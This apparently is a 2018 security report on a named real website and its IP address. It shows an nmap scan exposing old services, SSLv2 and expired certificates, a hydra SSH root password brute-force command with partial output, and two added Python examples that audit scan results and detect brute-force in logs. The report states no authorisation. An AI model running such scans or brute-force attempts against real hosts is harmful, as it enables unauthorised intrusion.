Arthur DOE - Web Security Report

Sep 25th, 2018
For the site fermeduchapiron.fr

I notice that it has no SSL certificate, so I decide to ping it in order to get its IP:
darto@invictus:[~]: ping fermeduchapiron.fr
PING fermeduchapiron.fr (188.165.224.172) 56(84) bytes of data.
64 bytes from ns212328.ip-188-165-224.eu (188.165.224.172): icmp_seq=1 ttl=128 time=30.7 ms
64 bytes from ns212328.ip-188-165-224.eu (188.165.224.172): icmp_seq=2 ttl=128 time=88.2 ms
64 bytes from ns212328.ip-188-165-224.eu (188.165.224.172): icmp_seq=3 ttl=128 time=185 ms
^C
--- fermeduchapiron.fr ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2003ms
rtt min/avg/max/mdev = 30.762/101.353/185.052/63.667 ms

Next I run nmap to see which ports and services are exposed:

darto@invictus:[~]: sudo nmap -A -v sV -O 188.165.224.172
Starting Nmap 6.47 ( http://nmap.org ) at 2018-09-25 11:45 CEST
NSE: Loaded 118 scripts for scanning.
NSE: Script Pre-scanning.
Failed to resolve "sV".
Initiating Ping Scan at 11:45
Scanning 188.165.224.172 [4 ports]
Completed Ping Scan at 11:45, 1.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 11:45
Completed Parallel DNS resolution of 1 host. at 11:45, 0.24s elapsed
Initiating SYN Stealth Scan at 11:45
Scanning ns212328.ip-188-165-224.eu (188.165.224.172) [1000 ports]
Discovered open port 110/tcp on 188.165.224.172
Discovered open port 995/tcp on 188.165.224.172
Discovered open port 25/tcp on 188.165.224.172
Discovered open port 22/tcp on 188.165.224.172
Discovered open port 53/tcp on 188.165.224.172
Discovered open port 993/tcp on 188.165.224.172
Discovered open port 21/tcp on 188.165.224.172
Discovered open port 143/tcp on 188.165.224.172
Discovered open port 587/tcp on 188.165.224.172
Discovered open port 443/tcp on 188.165.224.172
Discovered open port 80/tcp on 188.165.224.172
SYN Stealth Scan Timing: About 26.72% done; ETC: 11:47 (0:01:25 remaining)
Discovered open port 106/tcp on 188.165.224.172
Discovered open port 465/tcp on 188.165.224.172
SYN Stealth Scan Timing: About 56.27% done; ETC: 11:47 (0:01:10 remaining)
Discovered open port 8443/tcp on 188.165.224.172
SYN Stealth Scan Timing: About 70.38% done; ETC: 11:48 (0:00:54 remaining)
SYN Stealth Scan Timing: About 81.45% done; ETC: 11:48 (0:00:36 remaining)
Completed SYN Stealth Scan at 11:48, 204.19s elapsed (1000 total ports)
Initiating Service scan at 11:48
Scanning 14 services on ns212328.ip-188-165-224.eu (188.165.224.172)
Completed Service scan at 11:48, 19.66s elapsed (14 services on 1 host)
Initiating OS detection (try #1) against ns212328.ip-188-165-224.eu (188.165.224.172)
Retrying OS detection (try #2) against ns212328.ip-188-165-224.eu (188.165.224.172)
Initiating Traceroute at 11:49
Completed Traceroute at 11:49, 0.02s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 11:49
Completed Parallel DNS resolution of 2 hosts. at 11:49, 0.06s elapsed
NSE: Script scanning 188.165.224.172.
Initiating NSE at 11:49
Completed NSE at 11:51, 150.69s elapsed
Nmap scan report for ns212328.ip-188-165-224.eu (188.165.224.172)
Host is up (0.044s latency).
Not shown: 984 closed ports
PORT     STATE    SERVICE      VERSION
21/tcp   open     ftp          ProFTPD 1.3.4c
| ssl-cert: Subject: commonName=sciweb.fr
| Issuer: commonName=WoSign CA Free SSL Certificate G2/organizationName=WoSign CA Limited/countryName=CN
| Public Key type: rsa
| Public Key bits: 2048
| Not valid before: 2016-02-24T20:12:37+00:00
| Not valid after:  2019-02-24T20:12:37+00:00
| MD5:   3917 cdbb 33fc 0c05 68a9 e959 465c 6afd
|_SHA-1: e343 5003 0f28 d773 f9c1 e96b 3deb aa8d fcf9 40ab
|_ssl-date: 2018-09-25T09:49:22+00:00; +7s from local time.
22/tcp   open     ssh          OpenSSH 5.3 (protocol 2.0)
| ssh-hostkey:
|   1024 bf:8f:de:e6:cb:61:b3:3f:92:6d:25:49:05:10:e2:b7 (DSA)
|_  2048 73:6e:1b:44:49:ca:62:6f:8c:f6:d1:6a:36:17:12:17 (RSA)
25/tcp   open     smtp         Postfix smtpd
|_smtp-commands: sciweb.fr, PIPELINING, SIZE 10240000, ETRN, STARTTLS, AUTH DIGEST-MD5 LOGIN PLAIN CRAM-MD5, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| ssl-cert: Subject: commonName=ns212328.ip-188-165-224.eu/organizationName=OVH/stateOrProvinceName=France/countryName=--
| Issuer: commonName=ns212328.ip-188-165-224.eu/organizationName=OVH/stateOrProvinceName=France/countryName=--
| Public Key type: rsa
| Public Key bits: 1024
| Not valid before: 2014-01-22T19:02:55+00:00
| Not valid after:  2016-01-22T19:02:55+00:00
| MD5:   8870 1b15 5612 f069 aeb6 d0dd 8314 75e0
|_SHA-1: f2ea 4aae 5a6a 31d5 1691 c63c 3056 5fe4 e4e9 3311
|_ssl-date: 2018-09-25T09:49:22+00:00; +7s from local time.
53/tcp   open     domain       ISC BIND none
| dns-nsid:
|_  bind.version: none
80/tcp   open     http         nginx
|_http-favicon: Parallels Control Panel
|_http-methods: GET HEAD POST OPTIONS
|_http-title: Default Parallels Plesk Panel Page
106/tcp  open     pop3pw       poppassd
110/tcp  open     pop3         Courier pop3d
|_pop3-capabilities: PIPELINING SASL(LOGIN CRAM-MD5 CRAM-SHA1 CRAM-SHA256 PLAIN) TOP STLS USER LOGIN-DELAY(10) IMPLEMENTATION(Courier Mail Server) APOP UIDL
143/tcp  open     imap         Courier Imapd (released 2011)
|_imap-capabilities: IDLE THREAD=ORDEREDSUBJECT AUTH=PLAIN ACL2=UNION CAPABILITY IMAP4rev1 SORT AUTH=CRAM-MD5 UIDPLUS NAMESPACE completed ACL AUTH=CRAM-SHA256 AUTH=CRAM-SHA1 OK CHILDREN THREAD=REFERENCES QUOTA STARTTLSA0001
443/tcp  open     http         nginx
|_http-methods: No Allow or Public header in OPTIONS response (status code 400)
|_http-title: 400 The plain HTTP request was sent to HTTPS port
| ssl-cert: Subject: commonName=Parallels Panel/organizationName=Parallels/stateOrProvinceName=Virginia/countryName=US
| Issuer: commonName=Parallels Panel/organizationName=Parallels/stateOrProvinceName=Virginia/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Not valid before: 2014-01-22T19:05:41+00:00
| Not valid after:  2015-01-22T19:05:41+00:00
| MD5:   fe25 5bcf 00a6 3558 8231 1aed 2145 b67b
|_SHA-1: bcb0 1091 a602 c3f3 1661 a989 b6e3 1a4a 2040 3d71
|_ssl-date: 2018-09-25T09:49:23+00:00; +7s from local time.
| sslv2:
|   SSLv2 supported
|_  ciphers: none
445/tcp  filtered microsoft-ds
465/tcp  open     ssl/smtp     Postfix smtpd
|_smtp-commands: sciweb.fr, PIPELINING, SIZE 10240000, ETRN, AUTH DIGEST-MD5 LOGIN PLAIN CRAM-MD5, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| ssl-cert: Subject: commonName=ns212328.ip-188-165-224.eu/organizationName=OVH/stateOrProvinceName=France/countryName=--
| Issuer: commonName=ns212328.ip-188-165-224.eu/organizationName=OVH/stateOrProvinceName=France/countryName=--
| Public Key type: rsa
| Public Key bits: 1024
| Not valid before: 2014-01-22T19:02:55+00:00
| Not valid after:  2016-01-22T19:02:55+00:00
| MD5:   8870 1b15 5612 f069 aeb6 d0dd 8314 75e0
|_SHA-1: f2ea 4aae 5a6a 31d5 1691 c63c 3056 5fe4 e4e9 3311
514/tcp  filtered shell
587/tcp  open     smtp         Postfix smtpd
|_smtp-commands: sciweb.fr, PIPELINING, SIZE 10240000, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| ssl-cert: Subject: commonName=ns212328.ip-188-165-224.eu/organizationName=OVH/stateOrProvinceName=France/countryName=--
| Issuer: commonName=ns212328.ip-188-165-224.eu/organizationName=OVH/stateOrProvinceName=France/countryName=--
| Public Key type: rsa
| Public Key bits: 1024
| Not valid before: 2014-01-22T19:02:55+00:00
| Not valid after:  2016-01-22T19:02:55+00:00
| MD5:   8870 1b15 5612 f069 aeb6 d0dd 8314 75e0
|_SHA-1: f2ea 4aae 5a6a 31d5 1691 c63c 3056 5fe4 e4e9 3311
|_ssl-date: 2018-09-25T09:49:22+00:00; +7s from local time.
993/tcp  open     ssl/imap     Courier Imapd (released 2011)
|_imap-capabilities: IDLE THREAD=ORDEREDSUBJECT AUTH=PLAIN CAPABILITY IMAP4rev1 SORT AUTH=CRAM-MD5 ACL2=UNIONA0001 NAMESPACE completed ACL AUTH=CRAM-SHA256 AUTH=CRAM-SHA1 UIDPLUS OK THREAD=REFERENCES QUOTA CHILDREN
| ssl-cert: Subject: commonName=ns212328.ip-188-165-224.eu/organizationName=OVH/stateOrProvinceName=France/countryName=--
| Issuer: commonName=ns212328.ip-188-165-224.eu/organizationName=OVH/stateOrProvinceName=France/countryName=--
| Public Key type: rsa
| Public Key bits: 1024
| Not valid before: 2014-01-22T19:02:55+00:00
| Not valid after:  2016-01-22T19:02:55+00:00
| MD5:   8870 1b15 5612 f069 aeb6 d0dd 8314 75e0
|_SHA-1: f2ea 4aae 5a6a 31d5 1691 c63c 3056 5fe4 e4e9 3311
| sslv2:
|   SSLv2 supported
|   ciphers:
|_    SSL2_DES_192_EDE3_CBC_WITH_MD5
995/tcp  open     ssl/pop3     Courier pop3d
|_pop3-capabilities: APOP IMPLEMENTATION(Courier Mail Server) USER SASL(LOGIN PLAIN) TOP UIDL PIPELINING LOGIN-DELAY(10)
| ssl-cert: Subject: commonName=ns212328.ip-188-165-224.eu/organizationName=OVH/stateOrProvinceName=France/countryName=--
| Issuer: commonName=ns212328.ip-188-165-224.eu/organizationName=OVH/stateOrProvinceName=France/countryName=--
| Public Key type: rsa
| Public Key bits: 1024
| Not valid before: 2014-01-22T19:02:55+00:00
| Not valid after:  2016-01-22T19:02:55+00:00
| MD5:   8870 1b15 5612 f069 aeb6 d0dd 8314 75e0
|_SHA-1: f2ea 4aae 5a6a 31d5 1691 c63c 3056 5fe4 e4e9 3311
| sslv2:
|   SSLv2 supported
|   ciphers:
|_    SSL2_DES_192_EDE3_CBC_WITH_MD5
8443/tcp open     http         nginx
|_http-methods: No Allow or Public header in OPTIONS response (status code 400)
|_http-title: 400 The plain HTTP request was sent to HTTPS port
| ssl-cert: Subject: commonName=sciweb.fr
| Issuer: commonName=WoSign CA Free SSL Certificate G2/organizationName=WoSign CA Limited/countryName=CN
| Public Key type: rsa
| Public Key bits: 2048
| Not valid before: 2016-02-24T20:12:37+00:00
| Not valid after:  2019-02-24T20:12:37+00:00
| MD5:   3917 cdbb 33fc 0c05 68a9 e959 465c 6afd
|_SHA-1: e343 5003 0f28 d773 f9c1 e96b 3deb aa8d fcf9 40ab
|_ssl-date: 2018-09-25T09:49:22+00:00; +7s from local time.
Device type: general purpose|storage-misc|VoIP phone
Running (JUST GUESSING): Linux 2.4.X|3.X (98%), Microsoft Windows 7|XP (96%), BlueArc embedded (91%), Pirelli embedded (88%)
OS CPE: cpe:/o:linux:linux_kernel:2.4 cpe:/o:linux:linux_kernel:3 cpe:/o:microsoft:windows_7:::enterprise cpe:/o:microsoft:windows_xp::sp3 cpe:/h:bluearc:titan_2100 cpe:/h:pirelli:dp-10
Aggressive OS guesses: DD-WRT v24-sp2 (Linux 2.4.37) (98%), Linux 3.2 (98%), Microsoft Windows 7 Enterprise (96%), Microsoft Windows XP SP3 (96%), BlueArc Titan 2100 NAS device (91%), Pirelli DP-10 VoIP phone (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Hosts:  sciweb.fr, localhost.localdomain; OS: Unix

TRACEROUTE (using port 80/tcp)
HOP RTT     ADDRESS
1   0.12 ms 192.168.23.2
2   0.10 ms ns212328.ip-188-165-224.eu (188.165.224.172)

NSE: Script Post-scanning.
Initiating NSE at 11:51
Completed NSE at 11:51, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 403.58 seconds
          Raw packets sent: 1275 (59.332KB) | Rcvd: 1244 (50.404KB)

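From the defending side, the following is an added example (not part of the original report) that reads the ssl-cert and sslv2 script output of a scan like the one above and flags, per port, certificates that have already expired, RSA keys shorter than 2048 bits and SSLv2 support. The excerpt it runs on is constructed from the findings above with host names and IP addresses removed, and the reference date is pinned to the scan date (2018-09-25) so the result is reproducible.

```python
import re
from datetime import datetime, timezone

# Constructed excerpt modelled on the nmap output above (host names and IP dropped).
SCAN = """\
25/tcp   open     smtp         Postfix smtpd
| Public Key bits: 1024
| Not valid after:  2016-01-22T19:02:55+00:00
443/tcp  open     http         nginx
| Public Key bits: 2048
| Not valid after:  2015-01-22T19:05:41+00:00
| sslv2:
|_  SSLv2 supported
8443/tcp open     http         nginx
| Public Key bits: 2048
| Not valid after:  2019-02-24T20:12:37+00:00
"""
SCAN_DATE = datetime(2018, 9, 25, tzinfo=timezone.utc)  # date of the scan above

PORT_RE = re.compile(r"^(\d+)/tcp\s+open\b")
BITS_RE = re.compile(r"Public Key bits:\s*(\d+)")
AFTER_RE = re.compile(r"Not valid after:\s*(\S+)")


def parse_services(text):
    """Group nmap NSE output ('|' lines) under the open port line that owns them."""
    services, current = {}, None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = int(m.group(1))
            services[current] = []
        elif current is not None and line.startswith("|"):
            services[current].append(line)
    return services


def audit(text, now, min_bits=2048):
    """Return {port: [issues]} flagging expired certs, short RSA keys and SSLv2."""
    findings = {}
    for port, lines in parse_services(text).items():
        blob, issues = "\n".join(lines), []
        m = AFTER_RE.search(blob)
        if m and datetime.fromisoformat(m.group(1)) < now:  # aware vs aware
            issues.append("expired")
        m = BITS_RE.search(blob)
        if m and int(m.group(1)) < min_bits:
            issues.append("weak_key")
        if "SSLv2 supported" in blob:
            issues.append("sslv2")
        findings[port] = issues
    return findings
```

Calling audit(SCAN, SCAN_DATE) reports the mail port as expired with a weak key, the panel port as expired with SSLv2 enabled, and nothing for 8443, matching what a reader would conclude by hand from the output above.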
I notice that port 22 is open, so it is possible to connect over SSH. Logging in directly as root is possible, so I launch a brute-force to find a password:
darto@invictus:[~]: hydra -l root -P passwd.txt -t 10 -w 2 -s 22 -f 188.165.224.172 ssh
Hydra v8.0 (c) 2014 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes.

[WARNING] the waittime you set is low, this can result in errornous results
Hydra (http://www.thc.org/thc-hydra) starting at 2018-09-25 11:34:19
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 10 tasks per 1 server, overall 10 tasks, 100083 login tries (l:1/p:100083), ~1000 tries per task
[DATA] attacking service ssh on port 22
[STATUS] 100.00 tries/min, 100 tries in 00:01h, 99983 todo in 16:40h, 10 active
[STATUS] 73.33 tries/min, 220 tries in 00:03h, 99863 todo in 22:42h, 10 active
[STATUS] 65.71 tries/min, 460 tries in 00:07h, 99623 todo in 25:17h, 10 active
[STATUS] 62.67 tries/min, 940 tries in 00:15h, 99143 todo in 26:23h, 10 active
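As an added defender-side example (not from the original report), this detects an SSH password brute-force like the one launched above from sshd auth.log lines: any source producing five or more failed passwords inside a 60-second window is flagged, together with the accounts it tried. The log excerpt is constructed, using RFC 5737 documentation addresses, and the year is supplied by hand because syslog timestamps omit it.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd auth.log excerpt: one source hammering root, one user mistyping once.
AUTH_LOG = """\
Sep 25 11:34:19 ns sshd[4101]: Failed password for root from 203.0.113.7 port 51002 ssh2
Sep 25 11:34:19 ns sshd[4102]: Failed password for root from 203.0.113.7 port 51004 ssh2
Sep 25 11:34:20 ns sshd[4103]: Failed password for root from 203.0.113.7 port 51006 ssh2
Sep 25 11:34:20 ns sshd[4104]: Failed password for root from 203.0.113.7 port 51008 ssh2
Sep 25 11:34:21 ns sshd[4105]: Failed password for root from 203.0.113.7 port 51010 ssh2
Sep 25 11:34:40 ns sshd[4120]: Failed password for alice from 198.51.100.9 port 40022 ssh2
Sep 25 11:34:55 ns sshd[4121]: Accepted publickey for alice from 198.51.100.9 port 40024 ssh2
"""

FAIL_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port"
)


def parse_failures(log, year=2018):
    """Yield (timestamp, user, ip) for each failed-password line; syslog lacks the year."""
    for line in log.splitlines():
        m = FAIL_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["user"], m["ip"]


def brute_force_sources(log, threshold=5, window_s=60):
    """Return {ip: {'count': n, 'users': set}} for sources with at least `threshold`
    failures inside any `window_s`-second window (hydra -t 10 produces dozens a minute)."""
    by_ip = defaultdict(list)
    for ts, user, ip in parse_failures(log):
        by_ip[ip].append((ts, user))
    flagged = {}
    for ip, events in by_ip.items():
        events.sort()
        times = [t for t, _ in events]
        for i in range(len(times) - threshold + 1):
            if (times[i + threshold - 1] - times[i]).total_seconds() <= window_s:
                flagged[ip] = {"count": len(events), "users": {u for _, u in events}}
                break
    return flagged
```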


Kisses